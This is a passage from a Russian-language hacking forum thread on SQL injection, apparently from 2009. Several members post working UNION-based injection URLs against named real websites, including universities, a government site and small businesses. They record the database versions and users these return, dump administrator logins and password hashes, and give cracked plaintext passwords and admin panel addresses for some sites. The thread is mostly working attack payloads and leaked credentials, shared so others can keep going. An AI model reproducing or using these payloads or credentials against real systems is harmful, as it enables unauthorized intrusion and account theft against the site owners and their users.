SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.m-trans.vbg.ru/bl.php?id=-105+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9
    4.0.12:mtrans@localhost:mtrans

    Есть таблица users
    http://www.m-trans.vbg.ru/bl.php?id=-105+union+select+1,concat_ws(0x3a,id,login,pass),3,4,5,6,7,8,9+from+users

    1:mtrans:0d0b9ff307d6c7f6

    Админка: http://www.m-trans.vbg.ru/admin.php
    ------------
    http://yellopagespakistan.com/yp/bl.php?subcat=254+and+substring(version(),1,1)=5
     
    #9721 AlexSatter, 9 Jun 2009
    Last edited: 9 Jun 2009
    1 person likes this.
  2. BHYCHIK

    BHYCHIK Member

    Joined:
    30 Jan 2009
    Messages:
    52
    Likes Received:
    28
    Reputations:
    9
    Скуля на http://www.incult.es

    Уязвимый скрипт: http://www.incult.es/projectinfo.php?id=8

    Версия БД: 5.0.32-Debian_7etch10-log
    Имя БД: incult
    Юзер: incult@localhost
    ОС: pc-linux-gnu

    Таблицы, не входящие в information_schema
    http://www.incult.es/projectinfo.php?id=8%27+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name),13,14,15,16,17,18,19,20,21+from+information_schema.tables+where+table_schema%3C%3E%27information_schema%27--+

    Больше ничего интересного не нашёл.
     
  3. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Code:
    http://www.csm.org.nz/distance/index.php?id=191%27+union+select+concat_ws(0x3a,version(),database(),user())+limit+1,1/*
    version():4.0.27-standard-log
    database():csm
    user():[email protected]

    Code:
    http://www.csm.org.nz/distance/index.php?id=191%27+union+select+concat_ws(0x3a,user,pass)user+from+users+limit+1,1/*
    thoseguys:55ffc53f170544b887252ff7e454e5a3
     
    2 people like this.
  4. BHYCHIK

    BHYCHIK Member

    Joined:
    30 Jan 2009
    Messages:
    52
    Likes Received:
    28
    Reputations:
    9
    Скуля на http://biblioteca.unizar.es

    Уязвимый скрипт:http://biblioteca.unizar.es/biblio.php?id=27

    Версия БД: 4.0.20-standard
    Имя БД: biblioteca-biblioteca
    Юзер: [email protected]
    ОС: pc-linux

    Список юзеров и их паролей:
    http://biblioteca.unizar.es/biblio.php?id=-27+union+select+concat_ws(0x3a,login,pwd),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+usuarios+limit+0,1--+

    Привилегии FILE и доступа к mysql.user нет.
     
  5. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    PR 2
    Code:
    http://www.colgate13.org/members.php?memid=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7,8,9,10,11,12,13,14/*
    Database version : 4.1.16-standard-log
    Database name : colgate13
    User name : [email protected]
     
    1 person likes this.
  6. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.invictory.com.ua/tips_issue.php?id=1000000+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6+--+

    ivcomua_db@localhost:4.1.22-standard:ivcomua_db


    ####################################
    oracle :D

    http://oracle.ukrsat.com/tutorial/openxs.php?n=80+and+substring(version(),1,1)=3

    ########################################
    http://bloggreenwood.com/members/profile_view_ind.php?id=1'+and+substring(version(),1,1)=5+--+

    Ну и мое видео первое на ачате )) :D

    http://forum.antichat.ru/thread124487.html ссылка там ))
     
    _________________________
    #9726 HAXTA4OK, 9 Jun 2009
    Last edited: 10 Jun 2009
    1 person likes this.
  7. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    третья мускуль

    http://www.bicentenary.tas.gov.au/text.php?id=66+and+substring(version(),1,1)=3
     
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.akpr.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6
    [email protected]:u44790:5.0.67-log
    Code:
    http://www.newchemistry.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9
    [email protected]:u44790_3:5.0.67-log
    Code:
    http://polymery.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9
    [email protected]:u44790:5.0.67-log
    Code:
    http://petrochemistry.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9
    [email protected]:u44790_2:5.0.67-log
     
    #9728 mailbrush, 10 Jun 2009
    Last edited: 10 Jun 2009
  9. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    PR 6
    Code:
    http://www.mhfa.com.au/instructor_details.php?id=-694+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48/*
    Database version : 4.1.22-standard-log
    Database name : mhfa_db
    User name : [email protected]
     
    1 person likes this.
  10. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    Code:
    http://php.louisville[SIZE=4][COLOR=Lime].edu[/COLOR][/SIZE]/news/multimedia/multimedia.php?id=-99999+union+select+1,2,3,4,5,6,version(),8,9,10,11/*
    Database Version: 5.0.27-standard
    Database name: releases
    User name: [email protected]
     
    1 person likes this.
  11. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    PR3
    http://mywebs.ru/text.php?id=-10+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5
    5.0.67-log:[email protected]:u50510
    -------------
    Решил пройтись слегка по разделу Портфолио... нашел ещё несколько уязвимых сайтов:

    PR4, ТИЦ 130
    http://triluchnik.ru/text.php?id=-16+union+select+1,concat_ws(0x3a,version(),user(),database())
    5.0.67-log:[email protected]:u83453

    Заинтересовала таблица: pixelpost_config
    Выдираем данные
    http://triluchnik.ru/text.php?id=-16+union+select+1,concat_ws(0x3a,id,admin,password,email)+from+pixelpost_config
    1:admin:e807f1fcf82d132f9bb018ca6738a19f:[email protected]
    Расшифровываем:
    e807f1fcf82d132f9bb018ca6738a19f = 1234567890

    Есть вход админский через http://triluchnik.ru/admin
    там авторизация видимо через .htaccess, с указанными данными не получается.
     
    1 person likes this.
  12. Dimionx

    Dimionx Elder - Старейшина

    Joined:
    28 Aug 2008
    Messages:
    37
    Likes Received:
    12
    Reputations:
    4
    www.surf2surf.co.nz
    [PR=4]

    Code:
    http://www.surf2surf.co.nz/page.php?id=-111+union+select+1,concat_ws(0x0b,version(),user(),database()),3,4,5,6,7
    Версия - 5.0.45
    Юзер - surf2surf@localhost
    БД - surf2surf

    P.S. доступ к табличкам закрыт
     
    1 person likes this.
  13. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    PR2, ТИЦ 40
    http://nissanbu.ru/show_new.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4
    4.0.27-max-log:[email protected]:nissan60

    ------
    PR2, ТИЦ 90

    http://www.honda.spb.ru/news-text.php?id=-158+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7
    4.1.22:ralfart@localhost:ralfart

    p.s. Dimonx есть таблица admanager с кучей таблицей, всё доступно. кавыряй.
     
    #9733 AlexSatter, 10 Jun 2009
    Last edited: 10 Jun 2009
  14. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.promiseland.it/view.php?id=-2975/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

    Database Version: 5.0.45-log
    Database name: promiseland_news
    User name: promise_guest@localhost
     
  15. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    PR1
    http://www.akalita.com/press/text.php?id=-4+union+select+1,concat_ws(0xa,version(),user(),database()),3,4,5
    5.0.67-log [email protected] u98256_akalita

    Видимо на одном акке, несколько сайтов, которые пока не нашел
    Доступно несколько баз данных: u98256,u98256_1981,u98256_blog,u98256_akalita
    u98256_blog - вордпрессовская база данных.

    вытащил с wp_users админа
    1:admin:$P$Bol8Q7tR5wPHFqk6NkjB7R6/7FdLFa0

    в других базах ничего касающегося авторизации нет, в конфигах видимо всё прописано.
     
    #9735 AlexSatter, 10 Jun 2009
    Last edited: 10 Jun 2009
    1 person likes this.
  16. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    PR6
    Code:
    http://corsair.cs.iupui[SIZE=4][COLOR=White].edu[/COLOR][/SIZE]:20191/picturegallery/photo.php?id=-99999+union+select+1,2,3,version(),5/*
    Database Version: 5.0.22-standard
    Database name: jsellmer_db
    User name: jsellmer@localhost

    Getting Data from table phpbb_users ( Rows) from database test
    Fields username:user_password
    [0]:Anonymous:
    [1]:arowls:39b35d4edd6999d6bfaf563bfa2bb661
    [2]:solivares:b2693d9c2124f3ca9547b897794ac6a1(maya)
    [3]:Brian Lewis:2f2b4669f9c0d578a94c9a32fc72f1c8

    Getting Data from table userList ( Rows) from database test_db
    Fields user:pass:email
    [0]:nidodson:password:[email protected]
    [1]:na3d:password:[email protected]
     
  17. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    PR0, ТИЦ 0
    http://www.zhukovs.ru/text.php?id=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11/*
    4.0.20-log:brainz@localhost:brainz
    Есть база users, поля подобрал только user_id, user_password... искал где хранится имя пользователя, ... кончилась фантазия.
    http://www.zhukovs.ru/text.php?id=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user_id,user_password),9,10,11+from+users/*
    1:76a2173be6393254e72ffa4d6df1030a
    Хэш расшифровался легко:
    76a2173be6393254e72ffa4d6df1030a = passwd
     
  18. Dimionx

    Dimionx Elder - Старейшина

    Joined:
    28 Aug 2008
    Messages:
    37
    Likes Received:
    12
    Reputations:
    4
    www.tech-pack.co.nz
    [PR: 1]

    Code:
    http://www.tech-pack.co.nz/page.php?id=11+union+select+1,2,3,4,concat_ws(0x0b,version(),user(),database()),6,7,8
    Версия - 4.0.26-standard
    Юзер - techp@localhost
    БД - techp

    www.todayskitchens.co.nz
    [PR: 2]

    Code:
    http://www.todayskitchens.co.nz/page.php?id=-11+union+select+1,2,3,4,concat_ws(0x0b,version(),user(),database()),6,7,8
    Версия - 4.0.26-standard
    Юзер - todaysk@localhost
    БД - todaysk

    www.adventureconcepts.co.nz
    [PR: 3]

    Code:
    http://www.adventureconcepts.co.nz/page.php?id=11+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables
    Версия - 5.0.37-standard
    Юзер - advent_cms@localhost
    БД - advent_cms

    Code:
    http://www.adventureconcepts.co.nz/page.php?id=11+union+select+1,2,3,4,concat_ws(0x3a,table_name,column_name),6,7,8+from+information_schema.columns
    Все таблицы и колонки к ним

    www.gearcutting.co.nz
    [PR: 1]

    Code:
    http://www.gearcutting.co.nz/page.php?id=-11+union+select+1,2,3,4,concat_ws(0x0b,version(),user(),database()),6,7,8

    Версия - 4.0.26-standard
    Юзер - gearcms@localhost
    БД - gearcms

    www.clockworkstudio.co.nz
    [PR: 2]

    Code:
    http://www.clockworkstudio.co.nz/page.php?id=-11'+union+select+1,2,3,4,5,6,concat_ws(0x0b,version(),user(),database()),8,9,10/*
    Версия - 4.0.27-standard-log
    Юзер - [email protected]
    БД - clockwork

    Табличка с юзерами:

    Code:
    http://www.clockworkstudio.co.nz/page.php?id=-11'+union+select+1,2,3,4,5,6,concat_ws(0x0b,username,password),8,9,10+from+users+limit+1,1/*
    nick
    378867a9bad163c4c77062685b3584af:cl0ckw0rk

    Админка
    Code:
    www.clockworkstudio.co.nz/admin/
    Code:
    Логин - nick
    Пасс - cl0ckw0rk
     
  19. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    PR5
    http://www.stadtumbau-ost.info/index.php?request=/service/email-abo/nl-text.php?id=-41+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4
    4.1.22-standard-log:db63113@local2:db63113

    PR5, ТИЦ 140
    http://www.uapravo.org/text.php?id=-1189+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11
    5.0.32-Debian_7etch10-log:eek:leps@localhost:uapravo
    просмотрел таблицы, что касается пользователей, ничего нет...

    PR4, ТИЦ 1400
    http://edina-rodina.org/text.php?id=14+and+substring(version(),1,1)=5

    PR4
    http://www.lennartpersson.se/text.php?ID=910+and+substring(version(),1,1)=5

    PR4
    http://www.zionmag.org/text.php?id=633+and+substring(version(),1,1)=4

    PR4, ТИЦ 10
    http://auto.properm.ru/sale/text.php?id=7177+and+substring(version(),1,1)=5/*

    PR0, ТИЦ 0
    http://realmagazine.ru/rmgid/text.php?id=-604+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database())
    4.1.22-log:[email protected]:wwwrealmagaziner_wwwrealmagaziner

    PR0, ТИЦ 0
    http://www.mdsg.org.uk/text.php?ID=-0+and+substring(version(),1,1)=5
     
  20. erihtoney

    erihtoney Member

    Joined:
    3 Mar 2009
    Messages:
    91
    Likes Received:
    73
    Reputations:
    20
    version: 5.0.45
    user: amanmysql@localhost
    database: db_news


    tables
    columns
    inset into news
    columns
     
Thread Status:
Not open for further replies.